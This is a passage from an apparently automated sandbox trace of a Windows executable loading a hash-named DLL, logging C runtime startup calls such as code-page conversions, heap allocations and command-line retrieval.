\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0083.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0083.298] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0083.298] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0083.298] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0083.298] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0083.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0083.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0083.298] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0083.298] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0083.299] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0083.299] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x100) returned 0x442bf0 [0083.299] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0083.299] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x16c) returned 0x439a80 [0083.299] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0083.299] GetLastError () returned 0x0 [0083.299] SetLastError (dwErrCode=0x0) [0083.299] GetEnvironmentStringsW () returned 0x444660* [0083.299] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9cc) returned 0x445040 [0083.299] FreeEnvironmentStringsW (penv=0x444660) returned 1 [0083.299] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x118) returned 0x439d90 [0083.299] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3e) returned 0x4403e0 [0083.299] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x5c) returned 0x430780 [0083.299] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x434be0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x78) returned 0x43c6d0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x435a20 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x28) returned 0x43b750 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x48) returned 0x43ff80 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1a) returned 0x43b360 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3a) returned 0x440110 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x4344f0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2a) returned 0x43c750 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2e) returned 0x434c50 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1c) returned 0x43b900 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xd2) returned 0x435cb0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x7c) returned 0x433fe0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3a) returned 0x440b60 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x90) returned 0x433c10 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b480 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x30) returned 0x434560 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x36) returned 0x435a90 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c) returned 0x43ffd0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x52) returned 0x4390c0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c) returned 0x440980 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xd6) returned 0x4355f0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2e) returned 0x4320c0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1e) returned 0x43b4e0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2c) returned 0x432100 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x54) returned 0x4394e0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x52) returned 0x4395a0 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b570 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x42) returned 0x440070 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2c) returned 0x432140 [0083.300] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x44) returned 0x440160 [0083.301] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b7e0 [0083.301] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x445040 | out: hHeap=0x430000) returned 1 [0083.301] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1000) returned 0x444660 [0083.301] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0083.301] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0083.301] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeServer" [0083.301] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeServer", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x439750*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0083.302] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0083.305] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0083.306] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0083.306] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0083.306] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0083.306] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0083.307] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0083.307] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0083.308] GetProcessHeap () returned 0x430000 [0083.308] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0083.308] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0083.308] GetLastError () returned 0x0 [0083.308] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0083.308] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0083.308] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c8) returned 0x445af0 [0083.309] SetLastError (dwErrCode=0x0) [0083.309] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1200) returned 0x445ec0 [0083.311] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0083.311] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.311] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0083.311] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.311] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeServer" [0083.311] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeServer" [0083.311] GetACP () returned 0x4e4 [0083.311] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x228) returned 0x43ac80 [0083.311] IsValidCodePage (CodePage=0x4e4) returned 1 [0083.311] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0083.311] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0083.312] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.312] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0083.312] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0083.312] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.312] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0083.312] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0083.312] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0083.312] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0083.312] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" 